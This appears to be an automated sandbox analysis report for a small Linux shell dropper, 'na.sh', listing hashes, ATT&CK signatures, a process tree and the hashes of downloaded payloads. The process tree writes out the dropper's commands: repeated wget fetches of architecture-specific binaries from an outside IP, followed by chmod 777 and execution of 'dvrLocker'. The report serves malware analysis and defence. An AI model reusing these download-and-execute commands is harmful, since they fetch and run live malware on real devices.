Analysis
-
max time kernel
149s -
max time network
133s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10-10-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
na.sh
-
Size
372B
-
MD5
6b2644c0adca68c54a53a79842eb3b3c
-
SHA1
d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
-
SHA256
89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
-
SHA512
943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid Process 1511 chmod 1518 chmod 1522 chmod 1526 chmod 1530 chmod -
Deletes itself 1 IoCs
Processes:
dvrLockerpid Process 1531 dvrLocker -
Executes dropped EXE 5 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid Process /dvrLocker 1512 dvrLocker /dvrLocker 1519 dvrLocker /dvrLocker 1523 dvrLocker /dvrLocker 1527 dvrLocker /dvrLocker 1531 dvrLocker -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 4 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/479/maps dvrLocker File opened for reading /proc/679/maps dvrLocker File opened for reading /proc/683/maps dvrLocker File opened for reading /proc/708/maps dvrLocker -
Changes its process name 1 IoCs
Processes:
dvrLockerdescription pid Process Changes the process name, possibly in an attempt to hide itself 1531 dvrLocker -
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/1502/cmdline dvrLocker File opened for reading /proc/1515/cmdline dvrLocker File opened for reading /proc/16/cmdline dvrLocker File opened for reading /proc/1138/cmdline dvrLocker File opened for reading /proc/1532/cmdline dvrLocker File opened for reading /proc/15/cmdline dvrLocker File opened for reading /proc/650/cmdline dvrLocker File opened for reading /proc/3/cmdline dvrLocker File opened for reading /proc/6/cmdline dvrLocker File opened for reading /proc/12/cmdline dvrLocker File opened for reading /proc/526/cmdline dvrLocker File opened for reading /proc/557/cmdline dvrLocker File opened for reading /proc/1036/cmdline dvrLocker File opened for reading /proc/1086/cmdline dvrLocker File opened for reading /proc/1258/cmdline dvrLocker File opened for reading /proc/1533/cmdline dvrLocker File opened for reading /proc/17/cmdline dvrLocker File opened for reading /proc/84/cmdline dvrLocker File opened for reading /proc/115/cmdline dvrLocker File opened for reading /proc/676/cmdline dvrLocker File opened for reading /proc/1290/cmdline dvrLocker File opened for reading /proc/1477/cmdline dvrLocker File opened for reading /proc/21/cmdline dvrLocker File opened for reading /proc/203/cmdline dvrLocker File opened for reading /proc/1121/cmdline dvrLocker File opened for reading /proc/1317/cmdline dvrLocker File opened for reading /proc/1352/cmdline dvrLocker File opened for reading /proc/137/cmdline dvrLocker File opened for reading /proc/785/cmdline dvrLocker File opened for reading /proc/997/cmdline dvrLocker File opened for reading /proc/1379/cmdline dvrLocker File opened for reading /proc/28/cmdline dvrLocker File opened for reading /proc/82/cmdline dvrLocker File opened for reading /proc/484/cmdline dvrLocker File opened for reading /proc/1049/cmdline dvrLocker File opened for reading /proc/19/cmdline dvrLocker File opened for reading /proc/20/cmdline dvrLocker File opened for reading /proc/177/cmdline dvrLocker File opened for reading /proc/26/cmdline dvrLocker File opened for reading /proc/79/cmdline dvrLocker File opened for reading /proc/175/cmdline dvrLocker File opened for reading /proc/1011/cmdline dvrLocker File opened for reading /proc/1175/cmdline dvrLocker File opened for reading /proc/1240/cmdline dvrLocker File opened for reading /proc/166/cmdline dvrLocker File opened for reading /proc/663/cmdline dvrLocker File opened for reading /proc/1053/cmdline dvrLocker File opened for reading /proc/1056/cmdline dvrLocker File opened for reading /proc/1135/cmdline dvrLocker File opened for reading /proc/1503/cmdline dvrLocker File opened for reading /proc/10/cmdline dvrLocker File opened for reading /proc/78/cmdline dvrLocker File opened for reading /proc/85/cmdline dvrLocker File opened for reading /proc/89/cmdline dvrLocker File opened for reading /proc/1272/cmdline dvrLocker File opened for reading /proc/1176/cmdline dvrLocker File opened for reading /proc/1177/cmdline dvrLocker File opened for reading /proc/31/cmdline dvrLocker File opened for reading /proc/164/cmdline dvrLocker File opened for reading /proc/414/cmdline dvrLocker File opened for reading /proc/1130/cmdline dvrLocker File opened for reading /proc/1142/cmdline dvrLocker File opened for reading /proc/1156/cmdline dvrLocker File opened for reading /proc/1327/cmdline dvrLocker -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
na.shdescription ioc Process File opened for modification /tmp/0 na.sh
Processes
-
/tmp/na.sh/tmp/na.sh1⤵
- Writes file to tmp directory
PID:1508 -
/bin/rmrm -rf dvrLocker2⤵PID:1509
-
-
/usr/bin/wgetwget http://185.157.247.125/c/empsl -O -2⤵PID:1510
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1512
-
-
/usr/bin/wgetwget http://185.157.247.125/c/emips -O -2⤵
- System Network Configuration Discovery
PID:1514
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1519
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm -O -2⤵PID:1521
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1523
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm7 -O -2⤵PID:1525
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1527
-
-
/usr/bin/wgetwget http://185.157.247.125/c/ex86 -O -2⤵PID:1529
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Deletes itself
- Executes dropped EXE
- Reads process memory
- Changes its process name
- Reads runtime system information
PID:1531
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5300cd530fb0a7f7cf6db875f68c0483e
SHA1a4bce294dc142fb1354e917bed4d58c98f381850
SHA256a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1
-
Filesize
53KB
MD5521069251bdce0fbd37497b8f527ab23
SHA1020730190edde76dec3de9678351aa6e65ab91bf
SHA256aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72
SHA51209e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70
-
Filesize
29KB
MD5dba2d4fa85301b473ce27c4f2e2a0297
SHA130ec57316ef1bbe5840d997082a0b01003bf365f
SHA256b07efeec1020b016192a2c53567fa55e056f3219b0f77edef00ca60e50ecb797
SHA512b8fcabe3733b4d4d55b056d1cca76014839b3728b197aca440af4118e87602e3a6612ae4f24dd0c21fc43121dbe33cc798c3ad9006a4379dad250e4a2f5adc53
-
Filesize
41KB
MD53cfc76868e26201ac03e0583b7c8aaba
SHA103436d9d090e1f944fecf60adc1e45f90df20c26
SHA2568c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA51284add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2
-
Filesize
40KB
MD5c0b34d8a59f793b636b5424b8e96a64a
SHA1d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA51257446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4